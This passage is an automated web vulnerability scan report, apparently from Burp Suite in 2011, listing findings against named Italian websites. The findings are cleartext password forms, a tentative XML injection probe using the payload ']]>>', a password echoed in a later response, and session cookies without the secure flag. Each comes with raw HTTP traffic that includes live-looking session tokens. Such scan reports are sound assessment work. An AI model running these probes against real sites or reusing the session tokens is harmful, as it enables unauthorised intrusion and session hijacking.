ETag: "8f1c-10a57-4a053b0735be0"-gzip
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 22:13:48 GMT
X-Varnish: 373212939 294566969
Age: 356796
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 68183

// sole lib
/* COMMON anche singolo */
var DEF_RURL=document.location;var DEF_ERRURL='http://www.ilsole24ore.com/errore.shtml';var DEF_SITECODE='CO';var DEF_SUBSCRIBE_SCRIPT='http://du.ilsole24ore.com
...[SNIP]...
<div id="login-window">';content+='<form id="login-form" action="" method="post" name="authUser">';content+='<input value="" name="URL" type="hidden"/>
...[SNIP]...
<br /><input class="ie6_input" type="password" name="txtPassword" /></p>
...[SNIP]...

7.8. http://pf.rossoalice.alice.it/login.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pf.rossoalice.alice.it
Path:   /login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.html HTTP/1.1
Host: pf.rossoalice.alice.it
Proxy-Connection: keep-alive
Referer: http://mail.alice.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slat=1304375040; kp=1304375180480908

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 6649
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


<title>Login Virgilio Alic
...[SNIP]...
<body>
<form id="mail_servizi" name="mail_servizi" method="post" action="">
<div id="box-mail">
...[SNIP]...
<input name="usernameDisplay" id="usernameDisplay" tabindex="1" class="casella" type="text">
Password
<input name="password" id="password" tabindex="2" class="casella" type="password">
</div>
...[SNIP]...

7.9. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/area_personale/recupera_password.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /GlfeWeb/area_personale/recupera_password.jsp HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
Referer: http://www.genialloyd.it/GlfeWeb/gl/it/home.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819; JSESSIONID=00005WFXekXZm0F_JebtWBl4ats:13tj0fe6g

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:00 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: it
Content-Length: 12581


                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</h2><form name="homePageForm" method="post" action="/GlfeWeb/do/processHomePage"><input type="hidden" name="org.apache.struts.taglib.html.TOKEN" value="b66a3fcee95af683a7bb547bcebd9fbd">
...[SNIP]...
type="text" name="loginModel.userName" value="Username" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value=='Username')?this.value='':void(0);" class="text" title="Username"><input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password"><input type="hidden" name="method" value="login">
...[SNIP]...

7.10. http://www.genialloyd.it/GlfeWeb/gl/it/home.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/gl/it/home.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /GlfeWeb/gl/it/home.html HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:18 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Last-Modified: Mon, 02 May 2011 21:55:44 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 37797
Set-Cookie: JSESSIONID=0000VYnvNhNSM1dzVj-GDr5f3Wj:13tj0fg0c; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: it-IT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="it" xml:lang="it" xmlns="http://www.w3.org/1999/xhtml"><head><t
...[SNIP]...
</div><form name="homePageForm" method="post" action="/GlfeWeb/do/processHomePage"><div class="neutral">
...[SNIP]...
pe="text" name="loginModel.userName" value="Username" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value=='Username')?this.value='':void(0);" class="text" title="Username" /><input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password" /><input type="hidden" name="method" value="login" />
...[SNIP]...

7.11. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:12 GMT
Set-Cookie: JSESSIONID=D34A5D9383893442C0CECE0969DFDC09; Path=/
Set-Cookie: ATG_SESSION_ID=D34A5D9383893442C0CECE0969DFDC09; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.12. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Product.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sh4/catalog/Product.jsp?PRODID=SH246237857 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH245868
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; s_lastvisit=1304398129881; SC_LINKS_NW=%5B%5BB%5D%5D; SC_LINKS_VG=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304398796.2.2.utmcsr=luxury24.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304398796.2; __utmc=30117245; __utmb=30117245.1.10.1304398796; c=undefinedwww.luxury24.ilsole24ore.comwww.luxury24.ilsole24ore.com; s_nr=1304399018901-New; SC_LINKS_SH=S24%3Aprodotti%3ASoftware%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3ASoftware%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253ASoftware%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp%25253FPRODID%25253DSH246237857%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:42 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 33961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Small Office 24
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.13. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/order/statoOrdine.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sh4/catalog/order/statoOrdine.jsp;jsessionid=53628C5A5A5C18CA15C1BF2309D1783D HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH246140
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304393428.1.1.utmcsr=banchedati.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304393428.1; __utmc=30117245; __utmb=30117245.1.10.1304393428; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_nr=1304393455616-New; SC_LINKS_SH=S24%3Aprodotti%3APeriodici%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3APeriodici%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253APeriodici%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp%25253Bjsessionid%25253D53628C5A5A5C18CA1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:34:24 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Stato ordine</t
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/order/statoOrdine.jsp?login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.14. http://www.telecomitalia.it/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telecomitalia.it
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.telecomitalia.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Etag: "1304374209-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 02 May 2011 22:10:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
<head>
<
...[SNIP]...
</div><form action="/auth" accept-charset="UTF-8" method="post" id="ti-auth-login1-form">
<div>
...[SNIP]...
ame" class="username"
onblur="this.value=(this.value=='') ? 'Username' : this.value;"
onfocus="this.style.color='#000000'; this.value=(this.value=='Username') ? '' : this.value;" />
<input tabindex="200" id="password-false" type="password" name="password" class="password" value="Password"
onblur="this.value=(this.value=='') ? 'Password' : this.value;"
onfocus="this.style.color='#000000'; this.value=(this.value=='Password') ? '' : this.value;" />

       <label class="invisible" for="password">
...[SNIP]...

8. XML injection  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /quotazioni.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /quotazioni.php]]>> HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:28:53 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Vary: accept-language,accept-charset,Accept-Encoding,User-Agent
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1062

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9. Password returned in later response  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/area_personale/recupera_password.jsp

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.

Request 1

POST /GlfeWeb/do/processHomePage HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
Referer: http://www.genialloyd.it/GlfeWeb/gl/it/home.html
Cache-Control: max-age=0
Origin: http://www.genialloyd.it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000M-S4UAsOKhKYucD4N5NOSNU:13tj0fe6g; gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819
Content-Length: 139

org.apache.struts.taglib.html.TOKEN=01df86a0e89a7f431ff71a97666a966e&loginModel.userName=Username&loginModel.password=Password&method=login

Response 1

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 23:54:52 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.genialloyd.it/GlfeWeb/do/prepareLogin
Content-Length: 0
Set-Cookie: JSESSIONID=0000skVjWkCGNXBw3Njtz53N4Su:13tj0fe6g; Path=/
Content-Type: text/html
Content-Language: it-IT

Request 2

GET /GlfeWeb/area_personale/recupera_password.jsp HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819; JSESSIONID=00005WFXekXZm0F_JebtWBl4ats:13tj0fe6g

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:08 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: it
Content-Length: 12581


                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password">
...[SNIP]...

10. SSL cookie without secure flag set  previous  next
There are 12 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://account.musfiber.com/login.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.musfiber.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: account.musfiber.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:32:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" -->
<he
...[SNIP]...

10.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/recuperapassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/recuperapassword.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:22 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Content-Length: 6011
Expires: -1
Set-Cookie: JSESSIONID_AUTH=8xp2N1nh8BBHsHSDpxKfQvZTQGTxjLZYp8L4W6D1dGRYvPJ6SG1G!1105479713; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

10.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/registrautente.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/registrautente.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Expires: -1
Set-Cookie: JSESSIONID_AUTH=zdfWN1nchhvzYNWhbqpHMStZrjhmgxwlRN3LjKtxyY1jyShhywL4!519317924; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 24761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...

10.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p18485/serv.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p18485/serv.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21608/serv2.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21608/serv2.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:30 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
